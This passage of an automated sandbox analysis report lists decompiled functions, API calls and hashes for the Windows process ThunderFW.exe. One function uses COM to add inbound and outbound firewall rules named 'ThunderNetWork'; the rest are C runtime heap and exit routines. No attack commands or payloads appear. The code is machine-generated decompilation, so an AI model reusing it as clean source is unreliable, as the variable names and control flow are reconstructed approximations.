                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                      • Opcode ID: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                      • Instruction ID: 328e5c77b206eb01c5c4dd085cb03c2c4ac654035e51f3c9fb1ea2fb7f212fdc
                                                                                                                                                      • Opcode Fuzzy Hash: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
                                                                                                                                                      • Instruction Fuzzy Hash: 3A21AEB1600704EFC730EF19D881C9AB7F9EF483247104A2EF856A7291D775B925CB58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: ThunderFW.exe PID: 7156 Parent PID: 476 ThunderFW.exeCOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 00991058, Relevance: 1.5, APIs: 1, Instructions: 7comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CoCreateInstance.OLE32(0099DB0C,00000000,00000001,0099DB1C,?,00991135,00000000), ref: 0099106A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 542301482-0
                                                                                                                                                      • Opcode ID: 11af1fa5adb227a6d9f638b3a2dcba05370f674d6bbf44341c5235ed2570aa45
                                                                                                                                                      • Instruction ID: acf17e723457af0994cc4f5cd35ffaad6df0082fd96e8f6c570a0d934d10f02b
                                                                                                                                                      • Opcode Fuzzy Hash: 11af1fa5adb227a6d9f638b3a2dcba05370f674d6bbf44341c5235ed2570aa45
                                                                                                                                                      • Instruction Fuzzy Hash: 6CB012307DD30076DD201748CDC7F057A1167C0F04F110400B200240E6C2E20080E705
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00991372, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191comCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E00991372(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				void* _t135;
				void* _t163;
				void* _t166;
				signed int _t167;
				intOrPtr* _t169;

				_t167 = 0;
				_v16 = 0x80004005;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v28 = E009980F0(__edx, _a4);
				_v32 = E009980F0(__edx, "ThunderNetWork");
				_t85 = E009980F0(__edx, _a8);
				_v36 = _t85;
				__imp__CoInitializeEx(0, 2, _t166); // executed
				_v40 = _t85;
				if(_t85 == 0x80010106 || _t85 >= 0) {
					_t87 = E00991058( &_v24,  &_v24);
					_v16 = _t87;
					if(_t87 >= _t167) {
						_t95 = _v24;
						_t96 =  *((intOrPtr*)( *_t95 + 0x48))(_t95,  &_v20);
						_v16 = _t96;
						if(_t96 >= _t167) {
							_t97 = _v24;
							_t98 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97,  &_v12);
							_v16 = _t98;
							if(_t98 >= _t167) {
								if((_v12 & 0x00000004) != 0 && _v12 != 4) {
									_v12 = _v12 ^ 0x00000004;
								}
								_t169 = __imp__CoCreateInstance;
								_t100 =  *_t169(0x99db2c, _t167, 1, 0x99db3c,  &_v8, _t163, _t135); // executed
								_v16 = _t100;
								if(_t100 >= 0) {
									_t101 = _v8;
									 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v28);
									_t103 = _v8;
									 *((intOrPtr*)( *_t103 + 0x28))(_t103, _v32);
									_t105 = _v8;
									 *((intOrPtr*)( *_t105 + 0x30))(_t105, _v36);
									_t107 = _v8;
									 *((intOrPtr*)( *_t107 + 0x40))(_t107, 6);
									_t109 = _v8;
									 *((intOrPtr*)( *_t109 + 0x98))(_t109, _v12);
									_t111 = _v8;
									 *((intOrPtr*)( *_t111 + 0xa8))(_t111, 1);
									_t113 = _v8;
									 *((intOrPtr*)( *_t113 + 0x88))(_t113, 0xffffffff);
									_t115 = _v20;
									 *((intOrPtr*)( *_t115 + 0x20))(_t115, _v8);
									_t118 =  *_t169(0x99db2c, 0, 1, 0x99db3c,  &_v8);
									_v16 = _t118;
									if(_t118 >= 0) {
										_t119 = _v8;
										 *((intOrPtr*)( *_t119 + 0x20))(_t119, _v28);
										_t121 = _v8;
										 *((intOrPtr*)( *_t121 + 0x28))(_t121, _v32);
										_t123 = _v8;
										 *((intOrPtr*)( *_t123 + 0x30))(_t123, _v36);
										_t125 = _v8;
										 *((intOrPtr*)( *_t125 + 0x40))(_t125, 0x11);
										_t127 = _v8;
										 *((intOrPtr*)( *_t127 + 0x98))(_t127, _v12);
										_t129 = _v8;
										 *((intOrPtr*)( *_t129 + 0xa8))(_t129, 1);
										_t131 = _v8;
										 *((intOrPtr*)( *_t131 + 0x88))(_t131, 0xffffffff);
										_t133 = _v20;
										_v16 =  *((intOrPtr*)( *_t133 + 0x20))(_t133, _v8);
									}
								}
								_t167 = 0;
							}
						}
					}
				}
				_t88 = _v8;
				if(_t88 != _t167) {
					 *((intOrPtr*)( *_t88 + 8))(_t88);
				}
				_t89 = _v20;
				if(_t89 != _t167) {
					 *((intOrPtr*)( *_t89 + 8))(_t89);
				}
				_t90 = _v24;
				if(_t90 != _t167) {
					 *((intOrPtr*)( *_t90 + 8))(_t90);
				}
				if(_v40 >= _t167) {
					__imp__CoUninitialize(); // executed
				}
				return _v16;
			}












































                                                                                                                                                      0x0099137c
                                                                                                                                                      0x0099137e
                                                                                                                                                      0x00991385
                                                                                                                                                      0x00991388
                                                                                                                                                      0x0099138b
                                                                                                                                                      0x0099138e
                                                                                                                                                      0x0099139b
                                                                                                                                                      0x009913a6
                                                                                                                                                      0x009913a9
                                                                                                                                                      0x009913b1
                                                                                                                                                      0x009913b4
                                                                                                                                                      0x009913ba
                                                                                                                                                      0x009913c2
                                                                                                                                                      0x009913d0
                                                                                                                                                      0x009913d8
                                                                                                                                                      0x009913db
                                                                                                                                                      0x009913e1
                                                                                                                                                      0x009913eb
                                                                                                                                                      0x009913f0
                                                                                                                                                      0x009913f3
                                                                                                                                                      0x009913f9
                                                                                                                                                      0x00991403
                                                                                                                                                      0x00991408
                                                                                                                                                      0x0099140b
                                                                                                                                                      0x00991415
                                                                                                                                                      0x0099141d
                                                                                                                                                      0x0099141d
                                                                                                                                                      0x00991430
                                                                                                                                                      0x0099143c
                                                                                                                                                      0x0099143e
                                                                                                                                                      0x00991443
                                                                                                                                                      0x00991449
                                                                                                                                                      0x00991452
                                                                                                                                                      0x00991455
                                                                                                                                                      0x0099145e
                                                                                                                                                      0x00991461
                                                                                                                                                      0x0099146a
                                                                                                                                                      0x0099146d
                                                                                                                                                      0x00991475
                                                                                                                                                      0x00991478
                                                                                                                                                      0x00991481
                                                                                                                                                      0x00991487
                                                                                                                                                      0x0099148f
                                                                                                                                                      0x00991495
                                                                                                                                                      0x0099149d
                                                                                                                                                      0x009914a3
                                                                                                                                                      0x009914ac
                                                                                                                                                      0x009914b9
                                                                                                                                                      0x009914bb
                                                                                                                                                      0x009914c0
                                                                                                                                                      0x009914c2
                                                                                                                                                      0x009914cb
                                                                                                                                                      0x009914ce
                                                                                                                                                      0x009914d7
                                                                                                                                                      0x009914da
                                                                                                                                                      0x009914e3
                                                                                                                                                      0x009914e6
                                                                                                                                                      0x009914ee
                                                                                                                                                      0x009914f1
                                                                                                                                                      0x009914fa
                                                                                                                                                      0x00991500
                                                                                                                                                      0x00991508
                                                                                                                                                      0x0099150e
                                                                                                                                                      0x00991516
                                                                                                                                                      0x0099151c
                                                                                                                                                      0x00991528
                                                                                                                                                      0x00991528
                                                                                                                                                      0x009914c0
                                                                                                                                                      0x0099152c
                                                                                                                                                      0x0099152e
                                                                                                                                                      0x0099140b
                                                                                                                                                      0x009913f3
                                                                                                                                                      0x009913db
                                                                                                                                                      0x0099152f
                                                                                                                                                      0x00991534
                                                                                                                                                      0x00991539
                                                                                                                                                      0x00991539
                                                                                                                                                      0x0099153c
                                                                                                                                                      0x00991541
                                                                                                                                                      0x00991546
                                                                                                                                                      0x00991546
                                                                                                                                                      0x00991549
                                                                                                                                                      0x0099154e
                                                                                                                                                      0x00991553
                                                                                                                                                      0x00991553
                                                                                                                                                      0x0099155a
                                                                                                                                                      0x0099155c
                                                                                                                                                      0x0099155c
                                                                                                                                                      0x00991566

                                                                                                                                                      APIs
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 00991391
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 0099139E
                                                                                                                                                        • Part of subcall function 009980F0: lstrlenA.KERNEL32(?,315D8C09,?,80004005,?,000000FE,?,00991112,00000000), ref: 00998137
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00991112,00000000), ref: 0099814D
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00991112,00000000), ref: 0099815C
                                                                                                                                                        • Part of subcall function 009980F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00991112,00000000), ref: 009981EB
                                                                                                                                                        • Part of subcall function 009980F0: GetLastError.KERNEL32(?,000000FE,?,00991112,00000000), ref: 00998206
                                                                                                                                                        • Part of subcall function 009980F0: SysAllocString.OLEAUT32(00000000), ref: 00998221
                                                                                                                                                      • _com_util::ConvertStringToBSTR.COMSUPP ref: 009913A9
                                                                                                                                                        • Part of subcall function 009980F0: _malloc.LIBCMT ref: 009981A1
                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,80004005,ThunderNetWork,?), ref: 009913B4
                                                                                                                                                      • CoCreateInstance.OLE32(0099DB2C,00000000,00000001,0099DB3C,?), ref: 0099143C
                                                                                                                                                      • CoCreateInstance.OLE32(0099DB2C,00000000,00000001,0099DB3C,?), ref: 009914B9
                                                                                                                                                      • CoUninitialize.OLE32 ref: 0099155C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Convert_com_util::$ByteCharCreateErrorInstanceLastMultiWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                      • String ID: ThunderNetWork
                                                                                                                                                      • API String ID: 3644708077-3075295172
                                                                                                                                                      • Opcode ID: 076bde71e6531ce76e43649b736fb49c75c0068297d266bb1197b992bd830d9f
                                                                                                                                                      • Instruction ID: 09fa0f343c8280fa12cb38e51f2beaf27b814c30f0f5aafa88fc2546e9a05fd6
                                                                                                                                                      • Opcode Fuzzy Hash: 076bde71e6531ce76e43649b736fb49c75c0068297d266bb1197b992bd830d9f
                                                                                                                                                      • Instruction Fuzzy Hash: 8C719875A00219EFCF00DFE8C888A9EBBB9BF89715F204499F505EB251CB759A41DF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009974CC, Relevance: 6.1, APIs: 4, Instructions: 93memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                      			E009974CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t23;
				long _t24;
				void* _t25;
				long _t31;
				signed int _t32;
				signed int _t33;
				signed int _t39;
				signed int _t45;
				long _t49;
				void* _t52;
				void* _t53;

				_push(0xc);
				_push(0x99dec8);
				E00993F70(__ebx, __edi, __esi);
				_t39 =  *(_t52 + 8);
				if(_t39 <= 0) {
					L4:
					_t49 = _t39 *  *(_t52 + 0xc);
					 *(_t52 + 8) = _t49;
					__eflags = _t49;
					if(_t49 == 0) {
						_t49 = 1;
						__eflags = 1;
					}
					do {
						_t38 = 0;
						 *(_t52 - 0x1c) = 0;
						__eflags = _t49 - 0xffffffe0;
						if(_t49 > 0xffffffe0) {
							L13:
							__eflags = _t38;
							if(_t38 != 0) {
								L21:
								_t21 = _t38;
								L22:
								return E00993FB5(_t21);
							}
							__eflags =  *0x9a0a20; // 0x0
							if(__eflags == 0) {
								__eflags = _t38;
								if(_t38 == 0) {
									_t23 =  *(_t52 + 0x10);
									__eflags = _t23;
									if(_t23 != 0) {
										 *_t23 = 0xc;
									}
								}
								goto L21;
							}
							goto L15;
						}
						__eflags =  *0x9a0a98 - 3;
						if( *0x9a0a98 != 3) {
							L11:
							__eflags = _t38;
							if(_t38 != 0) {
								goto L21;
							}
							L12:
							_t25 = RtlAllocateHeap( *0x9a093c, 8, _t49); // executed
							_t38 = _t25;
							goto L13;
						}
						_t49 = _t49 + 0x0000000f & 0xfffffff0;
						 *(_t52 + 0xc) = _t49;
						__eflags =  *(_t52 + 8) -  *0x9a0a84; // 0x0
						if(__eflags > 0) {
							goto L11;
						}
						E00993C3D(0, 4);
						 *((intOrPtr*)(_t52 - 4)) = 0;
						_push( *(_t52 + 8));
						 *(_t52 - 0x1c) = E00996CFF();
						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
						E009975C8();
						_t38 =  *(_t52 - 0x1c);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L12;
						}
						E00994E20(0, _t38, 0,  *(_t52 + 8));
						_t53 = _t53 + 0xc;
						goto L11;
						L15:
						_t24 = E009945B5(_t49);
						__eflags = _t24;
					} while (_t24 != 0);
					_t31 =  *(_t52 + 0x10);
					__eflags = _t31;
					if(_t31 != 0) {
						 *_t31 = 0xc;
					}
					L3:
					_t21 = 0;
					goto L22;
				}
				_t32 = 0xffffffe0;
				_t33 = _t32 / _t39;
				_t45 = _t32 % _t39;
				asm("sbb eax, eax");
				_t58 = _t33 + 1;
				if(_t33 + 1 != 0) {
					goto L4;
				} else {
					 *((intOrPtr*)(E009938CA(_t58))) = 0xc;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00993862(_t45, 0, __esi);
					goto L3;
				}
			}















                                                                                                                                                      0x009974cc
                                                                                                                                                      0x009974ce
                                                                                                                                                      0x009974d3
                                                                                                                                                      0x009974d8
                                                                                                                                                      0x009974df
                                                                                                                                                      0x0099750f
                                                                                                                                                      0x00997513
                                                                                                                                                      0x00997515
                                                                                                                                                      0x00997518
                                                                                                                                                      0x0099751a
                                                                                                                                                      0x0099751e
                                                                                                                                                      0x0099751e
                                                                                                                                                      0x0099751e
                                                                                                                                                      0x0099751f
                                                                                                                                                      0x0099751f
                                                                                                                                                      0x00997521
                                                                                                                                                      0x00997524
                                                                                                                                                      0x00997527
                                                                                                                                                      0x00997592
                                                                                                                                                      0x00997592
                                                                                                                                                      0x00997594
                                                                                                                                                      0x009975e2
                                                                                                                                                      0x009975e2
                                                                                                                                                      0x009975e4
                                                                                                                                                      0x009975e9
                                                                                                                                                      0x009975e9
                                                                                                                                                      0x00997596
                                                                                                                                                      0x0099759c
                                                                                                                                                      0x009975d1
                                                                                                                                                      0x009975d3
                                                                                                                                                      0x009975d5
                                                                                                                                                      0x009975d8
                                                                                                                                                      0x009975da
                                                                                                                                                      0x009975dc
                                                                                                                                                      0x009975dc
                                                                                                                                                      0x009975da
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009975d3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0099759c
                                                                                                                                                      0x00997529
                                                                                                                                                      0x00997530
                                                                                                                                                      0x0099757d
                                                                                                                                                      0x0099757d
                                                                                                                                                      0x0099757f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00997581
                                                                                                                                                      0x0099758a
                                                                                                                                                      0x00997590
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00997590
                                                                                                                                                      0x00997535
                                                                                                                                                      0x00997538
                                                                                                                                                      0x0099753e
                                                                                                                                                      0x00997544
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00997548
                                                                                                                                                      0x0099754e
                                                                                                                                                      0x00997551
                                                                                                                                                      0x0099755a
                                                                                                                                                      0x0099755d
                                                                                                                                                      0x00997564
                                                                                                                                                      0x00997569
                                                                                                                                                      0x0099756c
                                                                                                                                                      0x0099756e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00997575
                                                                                                                                                      0x0099757a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0099759e
                                                                                                                                                      0x0099759f
                                                                                                                                                      0x009975a5
                                                                                                                                                      0x009975a5
                                                                                                                                                      0x009975ad
                                                                                                                                                      0x009975b0
                                                                                                                                                      0x009975b2
                                                                                                                                                      0x009975b8
                                                                                                                                                      0x009975b8
                                                                                                                                                      0x00997508
                                                                                                                                                      0x00997508
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00997508
                                                                                                                                                      0x009974e3
                                                                                                                                                      0x009974e6
                                                                                                                                                      0x009974e6
                                                                                                                                                      0x009974eb
                                                                                                                                                      0x009974ed
                                                                                                                                                      0x009974ee
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009974f0
                                                                                                                                                      0x009974f5
                                                                                                                                                      0x009974fb
                                                                                                                                                      0x009974fc
                                                                                                                                                      0x009974fd
                                                                                                                                                      0x009974fe
                                                                                                                                                      0x009974ff
                                                                                                                                                      0x00997500
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00997505

                                                                                                                                                      APIs
                                                                                                                                                      • __lock.LIBCMT ref: 00997548
                                                                                                                                                      • ___sbh_alloc_block.LIBCMT ref: 00997554
                                                                                                                                                      • _memset.LIBCMT ref: 00997575
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,0099DEC8,0000000C,00995589,00000000,?,00000000,00000000,00000000,?,0099334F,00000001,00000214,?,00000000), ref: 0099758A
                                                                                                                                                        • Part of subcall function 009938CA: __getptd_noexit.LIBCMT ref: 009938CA
                                                                                                                                                        • Part of subcall function 00993862: __decode_pointer.LIBCMT ref: 0099386D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3771094184-0
                                                                                                                                                      • Opcode ID: 61d9efc34da512213a597d65959b960b2e073a52dbb31d461c9bfbb1406c3059
                                                                                                                                                      • Instruction ID: ba8ee5bcf2fa72de05a3bfe36690b54f7aff035c8691c1610daf7d13bfb8b9ff
                                                                                                                                                      • Opcode Fuzzy Hash: 61d9efc34da512213a597d65959b960b2e073a52dbb31d461c9bfbb1406c3059
                                                                                                                                                      • Instruction Fuzzy Hash: 38212871A28600ABCF52AFACCC81A5DB765FFD1350F268615F81A9B1D1DB308E40DB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00992087, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00992087(int _a4) {

				E0099205C(_a4);
				ExitProcess(_a4);
			}



                                                                                                                                                      0x0099208f
                                                                                                                                                      0x00992098

                                                                                                                                                      APIs
                                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0099208F
                                                                                                                                                        • Part of subcall function 0099205C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00992094,00000000,?,0099740E,000000FF,0000001E,?,0099553F,00000000,00000001,00000000,?,00993BC7,00000018), ref: 00992066
                                                                                                                                                        • Part of subcall function 0099205C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00992076
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00992098
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                                      • Opcode ID: db9ee728ad8f987e5653ecb9b84683d1042bbac122295c6f6e4f6e33e9ab3637
                                                                                                                                                      • Instruction ID: 016f7e5932c56d13fcdd8c17d38f46d783b825bac2f09c5b5031c43a207aea5b
                                                                                                                                                      • Opcode Fuzzy Hash: db9ee728ad8f987e5653ecb9b84683d1042bbac122295c6f6e4f6e33e9ab3637
                                                                                                                                                      • Instruction Fuzzy Hash: B4B09231004108FBCF212F1ADC0AC4A7F2AEB813A0B108021F80809071DF72ED93EA90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00994D4A, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00994D4A(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x9a093c = _t6;
				if(_t6 != 0) {
					 *0x9a0a98 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                      0x00994d5f
                                                                                                                                                      0x00994d65
                                                                                                                                                      0x00994d6c
                                                                                                                                                      0x00994d73
                                                                                                                                                      0x00994d79
                                                                                                                                                      0x00994d6f
                                                                                                                                                      0x00994d6f
                                                                                                                                                      0x00994d6f

                                                                                                                                                      APIs
                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00994D5F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                      • Opcode ID: 2f2f81deb8fb08836b134671d54812ba8ec2c85ad2fc7069c269998446c3aae5
                                                                                                                                                      • Instruction ID: 50ec0a2f43495795cc69c98bae9f570cf1362d44e665dbeff152b41fd4c46fdb
                                                                                                                                                      • Opcode Fuzzy Hash: 2f2f81deb8fb08836b134671d54812ba8ec2c85ad2fc7069c269998446c3aae5
                                                                                                                                                      • Instruction Fuzzy Hash: AFD05EB66687059EEF015F757C09B263BDC9BC4395F108436B80CC6190E670D990EA80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009922A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                      			E009922A3(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00992177(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}










                                                                                                                                                      0x009922a8
                                                                                                                                                      0x009922aa
                                                                                                                                                      0x009922ac
                                                                                                                                                      0x009922af
                                                                                                                                                      0x009922b8

                                                                                                                                                      APIs
                                                                                                                                                      • _doexit.LIBCMT ref: 009922AF
                                                                                                                                                        • Part of subcall function 00992177: __lock.LIBCMT ref: 00992185
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 009921BC
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 009921D1
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 009921FB
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 00992211
                                                                                                                                                        • Part of subcall function 00992177: __decode_pointer.LIBCMT ref: 0099221E
                                                                                                                                                        • Part of subcall function 00992177: __initterm.LIBCMT ref: 0099224D
                                                                                                                                                        • Part of subcall function 00992177: __initterm.LIBCMT ref: 0099225D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.398091736.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                      • Associated: 00000012.00000002.398080396.0000000000990000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398104871.000000000099C000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398137583.000000000099F000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000012.00000002.398145055.00000000009A1000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                      • Instruction ID: 0e97d0a0ae380edd6ce84aaf26b12c07a81dcb6f0d28d3976cc2cb8ef860f8b8
                                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                      • Instruction Fuzzy Hash: F3B0923268420833DA202646AC03F063A4D8BC1B60E240020BA0C191A1A9A3A9628089
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00993148, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00993148() {
				void* _t1;

				_t1 = E009930D6(0); // executed
				return _t1;
			}




                                                                                                                                                      0x0099314a
                                                                                                                                                      0x00993150

                                                                                                                                                      APIs
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 0099314A
                                                                                                                                                        • Part of subcall function 009930D6: TlsGetValue.KERNEL32(00000000,?,0099314F,00000000,00995F7B,009A0398,00000000,00000314,?,00993A4C,009A0398,Microsoft Visual C++ Runtime Library,00012010), ref: 009930E8
